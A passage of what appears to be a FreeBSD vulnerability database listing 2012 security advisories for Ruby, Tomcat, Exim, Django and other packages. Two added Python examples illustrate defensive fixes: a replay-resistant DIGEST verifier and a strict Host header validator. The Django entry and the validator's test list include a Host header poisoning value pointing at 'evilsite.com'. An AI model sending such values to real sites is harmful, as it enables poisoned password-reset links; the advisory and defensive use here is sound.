<blockquote cite="http://www.ruby-lang.org/en/news/2012/11/09/ruby19-hashdos-cve-2012-5371/">
<p>A carefully crafted sequence of strings can cause a denial of service
attack on a service that parses the sequence to create a Hash
object using the strings as keys. For instance, this
vulnerability affects web applications that parse JSON data
sent from an untrusted entity.</p>
<p>This vulnerability is similar to CVE-2011-4815 for ruby 1.8.7. ruby
1.9 versions were using a modified MurmurHash function, but it has been
reported that there is a way to create a sequence of strings whose
hash values collide with each other. This fix changes the hash
function of the String object from MurmurHash to SipHash 2-4.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5371</cvename>
<url>http://www.ruby-lang.org/en/news/2012/11/09/ruby19-hashdos-cve-2012-5371/</url>
</references>
<dates>
<discovery>2012-11-10</discovery>
<entry>2012-11-10</entry>
</dates>
</vuln>
<vuln vid="152e4c7e-2a2e-11e2-99c7-00a0d181e71d">
<topic>tomcat -- authentication weaknesses</topic>
<affects>
<package>
<name>tomcat</name>
<range><gt>5.5.0</gt><lt>5.5.36</lt></range>
<range><gt>6.0.0</gt><lt>6.0.36</lt></range>
<range><gt>7.0.0</gt><lt>7.0.30</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Apache Software Foundation reports:</p>
<blockquote cite="http://tomcat.apache.org/security.html">
<p>Three weaknesses in Tomcat's implementation of DIGEST
authentication were identified and resolved:</p>
<ul>
<li> Tomcat tracked client rather than server nonces and nonce count.</li>
<li> When a session ID was present, authentication was bypassed.</li>
<li> The user name and password were not checked before indicating
that a nonce was stale.</li>
</ul>
<p>These issues reduced the security of DIGEST authentication making
replay attacks possible in some circumstances.</p>
<p>The first issue was identified by Tilmann Kuhn. The second and third
issues were identified by the Tomcat security team during the code
review resulting from the first issue.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3439</cvename>
<url>http://tomcat.apache.org/security.html</url>
<url>http://tomcat.apache.org/security-5.html</url>
<url>http://tomcat.apache.org/security-6.html</url>
<url>http://tomcat.apache.org/security-7.html</url>
</references>
<dates>
<discovery>2012-11-05</discovery>
<entry>2012-11-08</entry>
<modified>2012-11-09</modified>
</dates>
</vuln>
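The three weaknesses are easier to see against a verifier that gets them right. The following is an added example, not Tomcat code: a DIGEST verifier that only accepts nonces it issued itself, requires the nonce count to increase on every use of a nonce, and checks the user name and password before it ever answers "stale". The realm, the sample user, the nonce lifetime and the fixed client nonce are assumptions for illustration.

```python
import hashlib
import os
import time

# Added example (not Tomcat code): a DIGEST verifier that keeps its own record of the
# nonces it issued and the highest nonce count (nc) accepted for each, so a captured
# Authorization header cannot simply be sent again, and that checks the credentials
# before it ever answers "stale".

def _md5(text):
    return hashlib.md5(text.encode()).hexdigest()

class DigestVerifier:
    def __init__(self, realm, users, nonce_lifetime=300):
        self.realm = realm
        self.users = users          # username -> password; constructed sample, real code keeps HA1 only
        self.lifetime = nonce_lifetime
        self.nonces = {}            # server nonce -> [issued_at, highest nc accepted]

    def issue_nonce(self, now=None):
        """Generate a fresh server nonce (sent in WWW-Authenticate) and start tracking it."""
        nonce = os.urandom(16).hex()
        self.nonces[nonce] = [time.time() if now is None else now, 0]
        return nonce

    def expected_response(self, username, method, uri, nonce, nc, cnonce):
        """RFC 2617 response value with qop=auth."""
        ha1 = _md5("%s:%s:%s" % (username, self.realm, self.users[username]))
        ha2 = _md5("%s:%s" % (method, uri))
        return _md5("%s:%s:%s:%s:auth:%s" % (ha1, nonce, nc, cnonce, ha2))

    def verify(self, params, method, now=None):
        """Return 'ok', 'stale' (credentials good, client must fetch a new nonce) or 'reject'."""
        now = time.time() if now is None else now
        username = params.get("username")
        if username not in self.users:
            return "reject"
        # Credentials first: a wrong password is never answered with 'stale'.
        expected = self.expected_response(username, method, params["uri"],
                                          params["nonce"], params["nc"], params["cnonce"])
        if expected != params["response"]:
            return "reject"
        state = self.nonces.get(params["nonce"])
        if state is None:
            return "stale"          # never issued by this server, or already expired
        issued_at, highest_nc = state
        if now - issued_at > self.lifetime:
            del self.nonces[params["nonce"]]
            return "stale"
        nc = int(params["nc"], 16)
        if highest_nc >= nc:
            return "reject"         # replay: the nonce count did not increase
        state[1] = nc
        return "ok"

def client_request(username, password, realm, method, uri, nonce, nc, cnonce="0a4f113b"):
    """What a client puts in the Authorization header (only the fields the verifier needs)."""
    ha1 = _md5("%s:%s:%s" % (username, realm, password))
    ha2 = _md5("%s:%s" % (method, uri))
    response = _md5("%s:%s:%s:%s:auth:%s" % (ha1, nonce, nc, cnonce, ha2))
    return {"username": username, "uri": uri, "nonce": nonce,
            "nc": nc, "cnonce": cnonce, "response": response}

def replay_demo():
    """Walk through the three weaknesses; returns the verifier's decision for each request."""
    server = DigestVerifier("example", {"alice": "s3cret"})
    nonce = server.issue_nonce(now=1000.0)
    first = client_request("alice", "s3cret", "example", "GET", "/admin", nonce, "00000001")
    decisions = [server.verify(first, "GET", now=1001.0)]           # ok
    decisions.append(server.verify(first, "GET", now=1002.0))       # same header replayed
    second = client_request("alice", "s3cret", "example", "GET", "/admin", nonce, "00000002")
    decisions.append(server.verify(second, "GET", now=1003.0))      # ok, nc advanced
    forged = client_request("alice", "s3cret", "example", "GET", "/admin", "deadbeef", "00000001")
    decisions.append(server.verify(forged, "GET", now=1004.0))      # client-chosen nonce
    wrong = client_request("alice", "guess", "example", "GET", "/admin", nonce, "00000003")
    decisions.append(server.verify(wrong, "GET", now=1005.0))       # bad password, not 'stale'
    third = client_request("alice", "s3cret", "example", "GET", "/admin", nonce, "00000003")
    decisions.append(server.verify(third, "GET", now=1400.0))       # nonce older than lifetime
    return decisions
```

The nonce table is the part Tomcat lacked: a verifier that trusts the nonce and nc values the client sends has nothing to compare a replayed header against. Expiring entries bounds the table's size; in a real deployment it must also be shared or pinned across cluster nodes.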
<vuln vid="4ca26574-2a2c-11e2-99c7-00a0d181e71d">
<topic>tomcat -- Denial of Service</topic>
<affects>
<package>
<name>tomcat</name>
<range><gt>6.0.0</gt><lt>6.0.36</lt></range>
<range><gt>7.0.0</gt><lt>7.0.28</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Apache Software Foundation reports:</p>
<blockquote cite="http://tomcat.apache.org/security.html">
<p>The checks that limited the permitted size of request headers were
implemented too late in the request parsing process for the HTTP NIO
connector. This enabled a malicious user to trigger an
OutOfMemoryError by sending a single request with very large
headers. This issue was identified by Josh Spiewak.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2733</cvename>
<url>http://tomcat.apache.org/security.html</url>
<url>http://tomcat.apache.org/security-6.html</url>
<url>http://tomcat.apache.org/security-7.html</url>
</references>
<dates>
<discovery>2012-11-05</discovery>
<entry>2012-11-08</entry>
<modified>2012-11-09</modified>
</dates>
</vuln>
<vuln vid="4b8b748e-2a24-11e2-bb44-003067b2972c">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><le>11.2r202.243</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Adobe reports:</p>
<blockquote cite="https://www.adobe.com/support/security/bulletins/apsb12-24.html">
<p>These vulnerabilities could cause a crash and potentially allow an attacker to take control of the affected system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5274</cvename>
<cvename>CVE-2012-5275</cvename>
<cvename>CVE-2012-5276</cvename>
<cvename>CVE-2012-5277</cvename>
<cvename>CVE-2012-5278</cvename>
<cvename>CVE-2012-5279</cvename>
<cvename>CVE-2012-5280</cvename>
<url>https://www.adobe.com/support/security/bulletins/apsb12-24.html</url>
</references>
<dates>
<discovery>2012-10-08</discovery>
<entry>2012-11-02</entry>
</dates>
</vuln>
<vuln vid="38daea4f-2851-11e2-9483-14dae938ec40">
<topic>opera -- multiple vulnerabilities</topic>
<affects>
<package>
<name>opera</name>
<range><lt>12.10</lt></range>
</package>
<package>
<name>opera-devel</name>
<range><lt>12.10</lt></range>
</package>
<package>
<name>linux-opera</name>
<range><lt>12.10</lt></range>
</package>
<package>
<name>linux-opera-devel</name>
<range><lt>12.10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Opera reports:</p>
<blockquote cite="http://www.opera.com/support/kb/view/1030/">
<p>CORS (Cross-Origin Resource Sharing) allows web pages to retrieve
the contents of pages from other sites, with their permission,
as they would appear for the current user.
When requests are made in this way, the browser should only allow
the page content to be retrieved if the target site sends the
correct headers that give permission for their contents to be
used in this way. Specially crafted requests may trick Opera
into thinking that the target site has given permission when it
had not done so. This can result in the contents of any target page
being revealed to untrusted sites, including any
sensitive information or session IDs contained within the
source of those pages.</p>
</blockquote>
<p>Also reported are vulnerabilities involving SVG graphics and XSS.</p>
</body>
</description>
<references>
<url>http://www.opera.com/support/kb/view/1030/</url>
<url>http://www.opera.com/support/kb/view/1031/</url>
<url>http://www.opera.com/support/kb/view/1033/</url>
</references>
<dates>
<discovery>2012-11-06</discovery>
<entry>2012-11-06</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="36533a59-2770-11e2-bb44-003067b2972c">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><le>11.2r202.238</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Adobe reports:</p>
<blockquote cite="https://www.adobe.com/support/security/bulletins/apsb12-22.html">
<p>These vulnerabilities could cause a crash and potentially allow an attacker to take control of the affected system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5248</cvename>
<cvename>CVE-2012-5249</cvename>
<cvename>CVE-2012-5250</cvename>
<cvename>CVE-2012-5251</cvename>
<cvename>CVE-2012-5252</cvename>
<cvename>CVE-2012-5253</cvename>
<cvename>CVE-2012-5254</cvename>
<cvename>CVE-2012-5255</cvename>
<cvename>CVE-2012-5256</cvename>
<cvename>CVE-2012-5257</cvename>
<cvename>CVE-2012-5258</cvename>
<cvename>CVE-2012-5259</cvename>
<cvename>CVE-2012-5260</cvename>
<cvename>CVE-2012-5261</cvename>
<cvename>CVE-2012-5262</cvename>
<cvename>CVE-2012-5263</cvename>
<cvename>CVE-2012-5264</cvename>
<cvename>CVE-2012-5265</cvename>
<cvename>CVE-2012-5266</cvename>
<cvename>CVE-2012-5267</cvename>
<cvename>CVE-2012-5269</cvename>
<cvename>CVE-2012-5270</cvename>
<cvename>CVE-2012-5271</cvename>
<cvename>CVE-2012-5272</cvename>
<cvename>CVE-2012-5285</cvename>
<cvename>CVE-2012-5286</cvename>
<cvename>CVE-2012-5287</cvename>
<cvename>CVE-2012-5673</cvename>
<cvename>CVE-2012-2034</cvename>
<cvename>CVE-2012-2035</cvename>
<cvename>CVE-2012-2036</cvename>
<cvename>CVE-2012-2037</cvename>
<cvename>CVE-2012-2038</cvename>
<cvename>CVE-2012-2039</cvename>
<cvename>CVE-2012-2040</cvename>
<url>https://www.adobe.com/support/security/bulletins/apsb12-22.html</url>
</references>
<dates>
<discovery>2012-10-08</discovery>
<entry>2012-11-02</entry>
</dates>
</vuln>
<vuln vid="65539c54-2517-11e2-b9d6-20cf30e32f6d">
<topic>apache22 -- several vulnerabilities</topic>
<affects>
<package>
<name>apache22</name>
<range><gt>2.2.0</gt><lt>2.2.23</lt></range>
</package>
<package>
<name>apache22-event-mpm</name>
<range><gt>2.2.0</gt><lt>2.2.23</lt></range>
</package>
<package>
<name>apache22-itk-mpm</name>
<range><gt>2.2.0</gt><lt>2.2.23</lt></range>
</package>
<package>
<name>apache22-peruser-mpm</name>
<range><gt>2.2.0</gt><lt>2.2.23</lt></range>
</package>
<package>
<name>apache22-worker-mpm</name>
<range><gt>2.2.0</gt><lt>2.2.23</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Apache HTTP Server Project reports:</p>
<blockquote cite="http://httpd.apache.org/security/vulnerabilities_22.html">
<p>low: XSS in mod_negotiation when untrusted uploads are supported (CVE-2012-2687)</p>
<p>Possible XSS for sites which use mod_negotiation and
allow untrusted uploads to locations which have MultiViews enabled.</p>
<p>low: insecure LD_LIBRARY_PATH handling (CVE-2012-0883)</p>
</blockquote>
<p>The LD_LIBRARY_PATH issue (CVE-2012-0883) was already fixed in port version 2.2.22_5.</p>
</body>
</description>
<references>
<cvename>CVE-2012-2687</cvename>
<cvename>CVE-2012-0883</cvename><!-- already fixed in r301849 -->
</references>
<dates>
<discovery>2012-09-13</discovery>
<entry>2012-11-02</entry>
</dates>
</vuln>
<vuln vid="ec89dc70-2515-11e2-8eda-000a5e1e33c6">
<topic>webmin -- potential XSS attack via real name field</topic>
<affects>
<package>
<name>webmin</name>
<range><lt>1.600_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The webmin updates site reports:</p>
<blockquote cite="http://www.webmin.com/updates.html">
<p>Module: Change Passwords; Version: 1.600; Problem: Fix for potential XSS attack
via real name field; Solution: New module.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.webmin.com/updates.html</url>
</references>
<dates>
<discovery>2012-11-02</discovery>
<entry>2012-11-02</entry>
</dates>
</vuln>
<vuln vid="3decc87d-2498-11e2-b0c7-000d601460a4">
<topic>ruby -- Unintentional file creation caused by inserting an illegal NUL character</topic>
<affects>
<package>
<name>ruby</name>
<range><gt>1.9.3,1</gt><lt>1.9.3.286,1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The official ruby site reports:</p>
<blockquote cite="http://www.ruby-lang.org/en/news/2012/10/12/poisoned-NUL-byte-vulnerability/">
<p>A vulnerability was found that file creation routines can create
unintended files by strategically inserting NUL(s) in file paths.
This vulnerability has been reported as CVE-2012-4522.</p>
<p>Ruby can handle arbitrary binary patterns as Strings, including
NUL chars. On the other hand, OSes and other libraries tend not to.
They usually treat a NUL as an end-of-string mark. So to interface
them with Ruby, NUL chars should properly be avoided.</p>
<p>However, methods like IO#open did not check the filename passed to
them, and just passed those strings to lower-layer routines. This
led to the creation of unintended files.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4522</cvename>
<url>http://www.ruby-lang.org/en/news/2012/10/12/poisoned-NUL-byte-vulnerability/</url>
<url>https://access.redhat.com/security/cve/CVE-2012-4522/</url>
</references>
<dates>
<discovery>2012-10-12</discovery>
<entry>2012-11-01</entry>
</dates>
</vuln>
<vuln vid="2a093853-2495-11e2-b0c7-000d601460a4">
<topic>ruby -- $SAFE escaping vulnerability about Exception#to_s/NameError#to_s</topic>
<affects>
<package>
<name>ruby</name>
<range><gt>1.8.7,1</gt><lt>1.8.7.371,1</lt></range>
<range><gt>1.9.3,1</gt><lt>1.9.3.286,1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The official ruby site reports:</p>
<blockquote cite="http://www.ruby-lang.org/en/news/2012/10/12/cve-2012-4464-cve-2012-4466/">
<p>Vulnerabilities were found in Exception#to_s, NameError#to_s, and
name_err_mesg_to_s(), which is a Ruby interpreter-internal API.
Malicious user code can bypass the $SAFE check by utilizing one of
those security holes.</p>
<p>Ruby's $SAFE mechanism enables untrusted user code to run in
$SAFE &gt;= 4 mode. This is a kind of sandboxing, so some operations
are restricted in that mode to protect other data outside the
sandbox.</p>
<p>The problem found was around this mechanism. Exception#to_s,
NameError#to_s, and the name_err_mesg_to_s() interpreter-internal API
were not correctly handling the $SAFE bits, so a String object which
is not tainted can destructively be marked as tainted using them.
By using this, untrusted code in a sandbox can modify a
formerly-untainted string destructively.</p>
<p>Ruby 1.8 once had a similar security issue. It fixed
Exception#to_s and NameError#to_s, but the name_err_mesg_to_str() issue
survived the previous security fix.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4464</cvename>
<cvename>CVE-2012-4466</cvename>
<url>http://www.ruby-lang.org/en/news/2012/10/12/cve-2012-4464-cve-2012-4466/</url>
<url>https://access.redhat.com/security/cve/CVE-2012-4464/</url>
</references>
<dates>
<discovery>2012-08-21</discovery>
<entry>2012-11-01</entry>
</dates>
</vuln>
<vuln vid="4b738d54-2427-11e2-9817-c8600054b392">
<topic>RT -- Multiple Vulnerabilities</topic>
<affects>
<package>
<name>rt40</name>
<range><ge>4.0</ge><lt>4.0.8</lt></range>
</package>
<package>
<name>rt38</name>
<range><lt>3.8.15</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Best Practical reports:</p>
<blockquote cite="http://blog.bestpractical.com/2012/10/security-vulnerabilities-in-rt.html">
<p>All versions of RT are vulnerable to an email header injection
attack. Users with ModifySelf or AdminUser can cause RT to add
arbitrary headers or content to outgoing mail. Depending on the
scrips that are configured, this may be leveraged for information
leakage or phishing.</p>
<p>RT 4.0.0 and above and RTFM 2.0.0 and above contain a vulnerability
due to lack of proper rights checking, allowing any privileged user
to create Articles in any class.</p>
<p>All versions of RT with cross-site-request forgery (CSRF)
protection (RT 3.8.12 and above, RT 4.0.6 and above, and any
instances running the security patches released 2012-05-22) contain
a vulnerability which incorrectly allows through CSRF requests which
toggle ticket bookmarks.</p>
<p>All versions of RT are vulnerable to a confused deputy attack on
the user. While not strictly a CSRF attack, users who are not logged
in who are tricked into following a malicious link may, after
supplying their credentials, be subject to an attack which leverages
their credentials to modify arbitrary state. While users who were
logged in would have observed the CSRF protection page, users who
were not logged in receive no such warning due to the intervening
login process. RT has been extended to notify users of pending
actions during the login process.</p>
<p>RT 3.8.0 and above are susceptible to a number of vulnerabilities
concerning improper signing or encryption of messages using GnuPG;
if GnuPG is not enabled, none of the following affect you.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4730</cvename>
<cvename>CVE-2012-4731</cvename>
<cvename>CVE-2012-4732</cvename>
<cvename>CVE-2012-4734</cvename>
<cvename>CVE-2012-4735</cvename>
<cvename>CVE-2012-4884</cvename>
<url>http://blog.bestpractical.com/2012/10/security-vulnerabilities-in-rt.html</url>
</references>
<dates>
<discovery>2012-10-26</discovery>
<entry>2012-11-01</entry>
</dates>
</vuln>
<vuln vid="2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5">
<topic>drupal7 -- multiple vulnerabilities</topic>
<affects>
<package>
<name>drupal7</name>
<range><lt>7.16</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Drupal Security Team reports:</p>
<blockquote cite="http://drupal.org/node/1815912">
<ol>
<li>
<p>Arbitrary PHP code execution</p>
<p>A bug in the installer code was identified that allows an attacker
to re-install Drupal using an external database server under certain
transient conditions. This could allow the attacker to execute
arbitrary PHP code on the original server.</p>
</li>
<li>
<p>Information disclosure - OpenID module</p>
<p>For sites using the core OpenID module, an information disclosure
vulnerability was identified that allows an attacker to read files
on the local filesystem by attempting to log in to the site using a
malicious OpenID server.</p>
</li>
</ol>
</blockquote>
</body>
</description>
<references>
<url>http://drupal.org/node/1815912</url>
</references>
<dates>
<discovery>2012-10-17</discovery>
<entry>2012-10-31</entry>
</dates>
</vuln>
<vuln vid="6b3b1b97-207c-11e2-a03f-c8600054b392">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>16.0.2,1</lt></range>
<range><lt>10.0.10,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.10,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.13.2</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.10</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.13.2</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>16.0.2</lt></range>
<range><lt>10.0.10</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-90 Fixes for Location object issues</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4194</cvename>
<cvename>CVE-2012-4195</cvename>
<cvename>CVE-2012-4196</cvename>
<url>http://www.mozilla.org/security/known-vulnerabilities/</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-90.html</url>
</references>
<dates>
<discovery>2012-10-26</discovery>
<entry>2012-10-27</entry>
</dates>
</vuln>
<vuln vid="b0f3ab1f-1f3b-11e2-8fe9-0022156e8794">
<topic>Exim -- remote code execution</topic>
<affects>
<package>
<name>exim</name>
<range><ge>4.70</ge><lt>4.80.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>This vulnerability affects Exim instances built with DKIM
enabled (the default for the FreeBSD Exim port) and running
verification of DKIM signatures on incoming mail
messages.</p>
<p>Phil Pennock reports:</p>
<blockquote cite="https://lists.exim.org/lurker/message/20121026.080330.74b9147b.en.html">
<p>This is a SECURITY release, addressing a CRITICAL remote
code execution flaw in versions of Exim between 4.70 and
4.80 inclusive, when built with DKIM support (the default).</p>
<p>This security vulnerability can be exploited by anyone
who can send email from a domain for which they control the
DNS.</p>
<p>You are not vulnerable if you built Exim with DISABLE_DKIM
or if you put this at the start of an ACL plumbed into
acl_smtp_connect or acl_smtp_rcpt:</p>
<pre>warn control = dkim_disable_verify</pre>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5671</cvename>
<url>https://lists.exim.org/lurker/message/20121026.080330.74b9147b.en.html</url>
</references>
<dates>
<discovery>2012-10-25</discovery>
<entry>2012-10-26</entry>
</dates>
</vuln>
<vuln vid="5f326d75-1db9-11e2-bc8f-d0df9acfd7e5">
<topic>django -- multiple vulnerabilities</topic>
<affects>
<package>
<name>django</name>
<range><lt>1.4.2</lt></range>
</package>
<package>
<name>django13</name>
<range><lt>1.3.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Django Project reports:</p>
<blockquote cite="https://www.djangoproject.com/weblog/2012/oct/17/security/">
<ol>
<li>
<p>Host header poisoning</p>
<p>Some parts of Django -- independent of end-user-written applications
-- make use of full URLs, including domain name, which are generated
from the HTTP Host header. Some attacks against this are beyond Django's
ability to control, and require the web server to be properly configured;
Django's documentation has for some time contained notes advising users
on such configuration.</p>
<p>Django's own built-in parsing of the Host header is, however, still
vulnerable, as was reported to us recently. The Host header parsing
in Django 1.3 and Django 1.4 -- specifically, django.http.HttpRequest.get_host()
-- was incorrectly handling username/password information in the header.
Thus, for example, the following Host header would be accepted by Django when
running on "validsite.com":</p>
<p>Host: validsite.com:random@evilsite.com</p>
<p>Using this, an attacker can cause parts of Django -- particularly the
password-reset mechanism -- to generate and display arbitrary URLs to users.</p>
<p>To remedy this, the parsing in HttpRequest.get_host() is being modified; Host
headers which contain potentially dangerous content (such as username/password
pairs) now raise the exception django.core.exceptions.SuspiciousOperation.</p>
</li>
<li>
<p>Documentation of HttpOnly cookie option</p>
<p>As of Django 1.4, session cookies are always sent with the HttpOnly flag, which
provides some additional protection from cross-site scripting attacks by denying
client-side scripts access to the session cookie.</p>
<p>Though not directly a security issue in Django, it has been reported that the
Django 1.4 documentation incorrectly described this change, by claiming that this
was now the default for all cookies set by the HttpResponse.set_cookie() method.</p>
<p>The Django documentation has been updated to reflect that this only applies to the
session cookie. Users of Django are encouraged to review their use of set_cookie()
to ensure that the HttpOnly flag is being set or unset appropriately.</p>
</li>
</ol>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4520</cvename>
<url>https://www.djangoproject.com/weblog/2012/oct/17/security/</url>
</references>
<dates>
<discovery>2012-10-17</discovery>
<entry>2012-10-24</entry>
</dates>
</vuln>
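The advisory describes the 1.4.2 fix only in outline. The following is an added example, not Django's code, of a Host header parser in the same spirit: it accepts host[:port] only, so the userinfo form quoted above raises SuspiciousOperation instead of reaching the password-reset mail, and it checks the host against an allow-list before the value is used to build an absolute URL. The HOST_RE pattern, the allow-list, the sample headers and the reset-link layout are assumptions for illustration.

```python
import re

# Added example, not Django's own code: a strict Host header parser that rejects the
# userinfo form from the advisory and validates the result against an allow-list.

# host[:port], where host is a DNS name, an IPv4 literal or a bracketed IPv6 literal.
# Anything else (userinfo, paths, a second colon) fails to match and is rejected.
HOST_RE = re.compile(r"^([a-z0-9.\-]+|\[[a-f0-9:.]+\])(?::(\d{1,5}))?$")

class SuspiciousOperation(Exception):
    pass

def _host_matches(host, pattern):
    pattern = pattern.lower()
    if pattern.startswith("."):            # ".example.com" allows the domain and any subdomain
        return host == pattern[1:] or host.endswith(pattern)
    return host == pattern

def get_host(headers, allowed_hosts):
    """Return the validated host name from a header dict, or raise SuspiciousOperation."""
    raw = headers.get("Host", "")
    match = HOST_RE.match(raw.strip().lower())
    if match is None:
        raise SuspiciousOperation("invalid Host header: %r" % raw)
    host = match.group(1)
    if not any(_host_matches(host, pattern) for pattern in allowed_hosts):
        raise SuspiciousOperation("Host %r is not allowed" % host)
    return host

def build_password_reset_link(headers, allowed_hosts, token):
    """Absolute URL as a reset mail would embed it, built only from a validated host."""
    return "https://%s/reset/%s/" % (get_host(headers, allowed_hosts), token)

def check_sample_headers():
    """Run constructed Host values through get_host; returns {value: host or 'SuspiciousOperation'}."""
    allowed = [".validsite.com", "[::1]"]          # assumed allow-list
    samples = [                                    # constructed inputs
        "validsite.com",
        "www.validsite.com:8443",
        "[::1]:8000",
        "validsite.com:random@evilsite.com",       # the poisoning vector from the advisory
        "evilsite.com",
    ]
    out = {}
    for value in samples:
        try:
            out[value] = get_host({"Host": value}, allowed)
        except SuspiciousOperation:
            out[value] = "SuspiciousOperation"
    return out
```

The allow-list goes one step beyond the 1.4.2 change quoted above, which only tightened the parser: a syntactically valid but foreign Host value (the "evilsite.com" sample) is still rejected instead of being echoed into generated URLs.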
<vuln vid="a7706414-1be7-11e2-9aad-902b343deec9">
<topic>Wireshark -- Multiple Vulnerabilities</topic>
<affects>
<package>
<name>wireshark</name>
<range><le>1.8.2_1</le></range>
</package>
<package>
<name>wireshark-lite</name>
<range><le>1.8.2_1</le></range>
</package>
<package>
<name>tshark</name>
<range><le>1.8.2_1</le></range>
</package>
<package>
<name>tshark-lite</name>
<range><le>1.8.2_1</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Wireshark reports:</p>
<blockquote cite="http://www.wireshark.org/docs/relnotes/wireshark-1.8.3.html">
<p>The HSRP dissector could go into an infinite loop.</p>
<p>The PPP dissector could abort.</p>
<p>Martin Wilck discovered an infinite loop in the DRDA
dissector.</p>
<p>Laurent Butti discovered a buffer overflow in the LDP
dissector.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5237</cvename>
<cvename>CVE-2012-5238</cvename>
<cvename>CVE-2012-5239</cvename>
<cvename>CVE-2012-5240</cvename>
<url>http://www.wireshark.org/security/wnpa-sec-2012-26.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-27.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-28.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-29.html</url>
<url>http://www.wireshark.org/docs/relnotes/wireshark-1.8.3.html</url>
</references>
<dates>
<discovery>2012-10-02</discovery>
<entry>2012-10-22</entry>
<modified>2013-06-19</modified>
</dates>
</vuln>
<vuln vid="57652765-18aa-11e2-8382-00a0d181e71d">
<topic>xlockmore -- local exploit</topic>
<affects>
<package>
<name>xlockmore</name>
<range><lt>5.40_1</lt></range>
</package>
<package>
<name>ja-xlockmore</name>
<range><lt>5.40_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Ignatios Souvatzis of NetBSD reports:</p>
<blockquote cite="http://www.openwall.com/lists/oss-security/2012/10/17/10">
<p>Due to an error in the dclock screensaver in xlockmore, users who
explicitly use this screensaver or a random mix of screensavers using
something like "xlockmore -mode random" may have their screen unlocked
unexpectedly at a random time.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4524</cvename>
<mlist>http://www.openwall.com/lists/oss-security/2012/10/17/10</mlist>
</references>
<dates>
<discovery>2012-10-17</discovery>
<entry>2012-10-17</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="e11955ca-187c-11e2-be36-00215af774f0">
<topic>xinetd -- attackers can bypass access restrictions if tcpmux-servers service enabled</topic>
<affects>
<package>
<name>xinetd</name>
<range><lt>2.3.15</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Thomas Swan reports:</p>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=790940">
<p>xinetd allows for services to be configured with the TCPMUX
or TCPMUXPLUS service types, which makes those services
available on port 1, as per RFC 1078 [1], if the tcpmux-server
service is enabled. When the tcpmux-server service is enabled,
xinetd would expose _all_ enabled services via the tcpmux port,
instead of just the configured service(s). This could allow
a remote attacker to bypass firewall restrictions and access
services via the tcpmux port.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0862</cvename>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=790940</url>
</references>
<dates>
<discovery>2012-02-15</discovery>
<entry>2012-10-17</entry>
</dates>
</vuln>
<vuln vid="ec34d0c2-1799-11e2-b4ab-000c29033c32">
<topic>Zend Framework -- Multiple vulnerabilities via XXE injection</topic>
<affects>
<package>
<name>ZendFramework</name>
<range><lt>1.11.13</lt></range>
</package>
<package>
<name>magento</name>
<range><lt>1.7.0.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
